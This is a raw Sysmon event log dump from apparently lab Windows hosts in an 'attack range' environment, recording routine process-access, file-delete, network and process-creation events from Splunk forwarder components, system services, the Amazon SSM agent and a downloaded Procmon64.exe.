10341000x8000000000000000293480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:21.309{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-134D-6216-6706-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:21.309{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:21.309{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:21.309{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:21.309{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:21.309{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-134D-6216-6706-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:21.309{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-134D-6216-6706-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:21.310{C8EA50B7-134D-6216-6706-000000003802}6380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:22.631{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6635B44B5E45720A4EC1468D09D96995,SHA256=BD3EE431183C6ED306CE8C97612B62C1574E2CEB77FFF412C97756271D12EB20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:22.911{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B1C821A1B8E41EAB93B79C917FD90AC,SHA256=6AFE79B5F9B10A8AB7098CF4FFBCEC19E4D333BA4E74AEB3A73E5F49587A3A84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:23.740{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E51F5BE5692157B8594875EAAE44B13C,SHA256=8A60ACDEA1DB7898D356E66BCF4B2BCFA497F4FB6B2F1B973854F7F9AADB0046,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:23.926{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD3007BFA5025EE287D6C46618B1F92D,SHA256=09C8B7F4D0499B3D7CA14BB64CC639BA3F000B4A51E4A698D5FA1C808ABF802C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:24.912{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D32660144FF91BA01EA4955AD3D4810,SHA256=5794F6AECBAAE2B137B88D287A00FD2452CF06994C2D86DB40A7EBA70C57ECF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:24.961{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=902CEA3660B1F94C6B89A4B657EE094F,SHA256=B508D78723BC63FDE43A56A573E299D4FC15C04801A893664DBFE10B2FDB5622,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:22.631{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53804-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:25.978{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0ABBE02B0C1FBD63692EF42502D51C5,SHA256=D1180210D684D7DE023EAEBEF211F5CA82F81C2B0E700A03E96FA8B45A54B0D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:25.974{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E60337A022AA7E1D4109998C91FD75B1,SHA256=6034AE3B77BCAC9D3A896D74471DD5AB4D637833F585D561B4ED181F48B1F406,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:22.641{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51430-false10.0.1.12-8000- 23542300x8000000000000000293488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:27.666{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-141MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:27.008{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C70535D5B7CDB4E49DE2A95FDD30AA06,SHA256=A8787E67096154A618868970D1EC7DBA3D1264D1C58763AC68EFAC07664AD5F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:27.005{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=948876F196F910CA4AE38F64AE3DE32F,SHA256=9CEA30F7CB6B2D00ECAE864938798E52CFF3D2D101C67BC07BA91D76510EA562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:28.021{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E8C784122B7DCAAE78912C70AEC8195,SHA256=71DC7C04DBAF6362210B8E5DBE80237DCBB98DC1F647977872611E4213AA1826,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:28.677{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-142MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:28.010{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAFF812D67E1079A9136A0C515F49DD6,SHA256=8BAEC1A3ECE1FD6E0BB7D26012AC0FAF4AD42C5FC5D870D478A5154134B61CB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:29.146{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01311E747824F10B04305C39402B986A,SHA256=5F904523882A65C191E99DDA978B715449D084601C93B8C9FB83107E56871775,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:27.715{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53805-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:29.026{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=930771AF28BD36CF60BEA97FB8D9FF09,SHA256=40343041A1B482482C4F82F482420FE1FBF5B9DB4FC2E6516DE0CDF3497181E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:30.349{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=AD2F2B0A0232D2135FD9131D53F271AE,SHA256=878F49A6364824C8EA98A94837DC4FFCDB7B9528246B1E98279FF121C1BDD8CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:30.146{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=159978E6134A792FEA174DB7DA23202B,SHA256=4515065028E5FD8A0036A30D2310778053698C2588194C9A55682121282277E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:30.527{C8EA50B7-F2AD-6215-C000-000000003802}48563616C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:30.527{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:30.527{C8EA50B7-F2AD-6215-C000-000000003802}48563616C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:30.527{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:30.527{C8EA50B7-F2AD-6215-C000-000000003802}48563616C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:30.527{C8EA50B7-F2AD-6215-C000-000000003802}48564884C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:30.527{C8EA50B7-F2AD-6215-C000-000000003802}48563616C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:30.511{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:30.027{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63087E7A09A165972325EA66BFC0D693,SHA256=70681B99498119F3D7C159A48D42B36465F6DCEB13BEA49A7D0018E7CE49A9A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:27.688{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program 